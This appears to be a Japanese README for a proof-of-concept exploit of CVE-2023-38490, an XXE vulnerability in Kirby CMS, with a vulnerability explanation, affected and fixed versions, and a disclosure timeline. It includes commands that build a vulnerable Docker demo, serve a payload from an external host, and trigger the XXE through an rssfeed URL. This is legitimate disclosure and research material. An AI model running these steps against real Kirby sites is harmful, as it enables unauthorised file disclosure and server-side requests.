Kirby XML External Entity (XXE) - CVE-2023-38490 エクスプロイト
Kirby < 3.9.6 XML External Entity
CVE-2023-38490 / GHSA-q386-w6fg-gmgp のエクスプロイト
エクスプロイトデモ
脆弱なデモアプリをビルドして実行:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
デモペイロードを提供:
注: docker コンテナがアクセスできるバインドアドレスを選択してください。
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
エクスプロイトを実行:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
どのように機能し、なぜ機能するのか?
脆弱な関数は Kirby Core に存在しますが、Kirby Core、Kirby StarterKit、Kirby PlainKit ではデフォルトでは使用されません。つまり、デフォルト設定では影響を受けませんが、カスタム開発や影響を受けるツールキットを使用するプラグインのインストールによって脆弱性が導入される可能性があります。
詳細については、専用記事 (EN 🇬🇧 または FR 🇫🇷) をお読みください。
参考文献
- 対象ソフトウェア: Kirby
- ホームページ / ベンダー: https://getkirby.com/
- ソースコード:
- 脆弱性のあるバージョン:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- 修正済みバージョン:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- パッチ:
- アドバイザリ:
タイムライン
- 第24週 - 2023年6月12日(月): 脆弱性を Alexandre ZANNI (@noraj) が発見(ACCEIS のペネトレーションテストエンジニア)
- 第24週 - 2023年6月13日(火): Alexandre ZANNI が脆弱性をエディタ (Kirby) に報告
- 第24週 - 2023年6月14日(水): Alexandre ZANNI が Proof of Concept をエディタ (Kirby) と共有
- 第24週 - 2023年6月14日(水): RFC 9116 security.txt が getkirby.com に追加
- 第24週 - 2023年6月15日(木): エディタ (Kirby) が脆弱性を確認
- 第24週 - 2023年6月15日(木): 修正とパッチのリリースを計画
- 第26週 - 2023年6月29日(木): Patrick FALB (@dapatrese) が FORMER 03 にて独自に脆弱性を発見
- 第28週 - 2023年7月16日(日): プライベート GitHub アドバイザリの作成
- 第29週 - 2023年7月23日(日): CVE ID をリクエスト
- 第29週 - 2023年7月23日(日): エディタ (Kirby) が脆弱性を修正
- 第30週 - 2023年7月24日(月): Alexandre ZANNI がエディタ (Kirby) からプライベートアドバイザリに招待される
- 第30週 - 2023年7月24日(月): Alexandre ZANNI が脆弱なデモ Docker コンテナを準備
- 第30週 - 2023年7月24日(月): CVE ID CVE-2023-38490 が登録 (予約) される
- 第30週 - 2023年7月27日(木): GitHub アドバイザリとパッチの公開リリース
免責事項
ACCEIS はいかなる違法行為も促進または奨励するものではありません。このリポジトリで提供されるすべてのコンテンツは、研究、教育、および脅威検出の目的のみを意図しています。